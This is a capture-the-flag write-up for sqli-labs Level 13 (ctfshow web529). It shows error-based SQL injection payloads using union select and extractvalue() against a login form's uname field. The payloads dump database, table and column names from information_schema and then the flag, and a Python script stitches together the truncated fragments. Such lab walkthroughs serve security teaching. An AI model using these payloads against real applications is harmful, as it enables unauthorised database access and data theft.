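Sqli-labs Level 13 (web529)
The interface is the same as before.
I won't test the closure and column count again. The closure is ') and the column count is 2. Error messages are displayed, so let's use this level to practice error-based injection again.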
Dump the databases: ctfshow
uname=-1') union select 1,(extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata))))--+&passwd=123456&submit=Submit
Dump the tables: flag
uname=-1') union select 1,(extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'))))--+&passwd=123456&submit=Submit
Dump the columns: flag4
uname=-1') union select 1,(extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flag'))))--+&passwd=123456&submit=Submit
Get the field (flag): ctfshow{9328fa92-cc6b-4bf8-9f1b-b9eb9536a064}
uname=-1') union select 1,(extractvalue(1,concat(0x7e,(select group_concat(flag4) from ctfshow.flag)))) --+&passwd=123456&submit=Submit
ctfshow{9328fa92-cc6b-4bf8-9f1b
Read it in reverse:
uname=-1') union select 1,(extractvalue(1,concat(0x7e,(select reverse(group_concat(flag4)) from ctfshow.flag)))) --+&passwd=123456&submit=Submit
After reversing it with a script: 92-cc6b-4bf8-9f1b-b9eb9536a064}
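The two fragments above are each 31 characters long because MySQL caps the extractvalue() error text at 32 characters, one of which is the 0x7e marker. The following Python script is an added example, not the script used in the original write-up: it flips the reverse() output back and joins it to the forward fragment on their overlap. The function and constant names are assumptions made for illustration.

```python
# Added example (not from the original write-up). extractvalue() error text is
# capped at 32 characters, so after the 0x7e ("~") marker each response carries
# at most 31 characters of data.
XPATH_ERROR_DATA_LIMIT = 31

# Forward fragment exactly as shown in the write-up.
FORWARD_FRAGMENT = "ctfshow{9328fa92-cc6b-4bf8-9f1b"
# The write-up only shows the reverse() output after it was flipped back, so the
# raw server value is rebuilt here by reversing that string again.
REVERSED_FRAGMENT = "92-cc6b-4bf8-9f1b-b9eb9536a064}"[::-1]


def overlap_length(head: str, tail: str) -> int:
    """Length of the longest suffix of head that is also a prefix of tail."""
    for k in range(min(len(head), len(tail)), 0, -1):
        if head.endswith(tail[:k]):
            return k
    return 0


def stitch(forward: str, reversed_fragment: str) -> str:
    """Rebuild the full value from a forward and a reverse() fragment."""
    tail = reversed_fragment[::-1]  # undo the SQL reverse()
    k = overlap_length(forward, tail)
    if k == 0:
        # No shared characters: the value may be longer than two windows, and
        # adjacency cannot be told apart from a missing middle slice.
        raise ValueError("fragments do not overlap")
    return forward + tail[k:]


if __name__ == "__main__":
    print(stitch(FORWARD_FRAGMENT, REVERSED_FRAGMENT))
```
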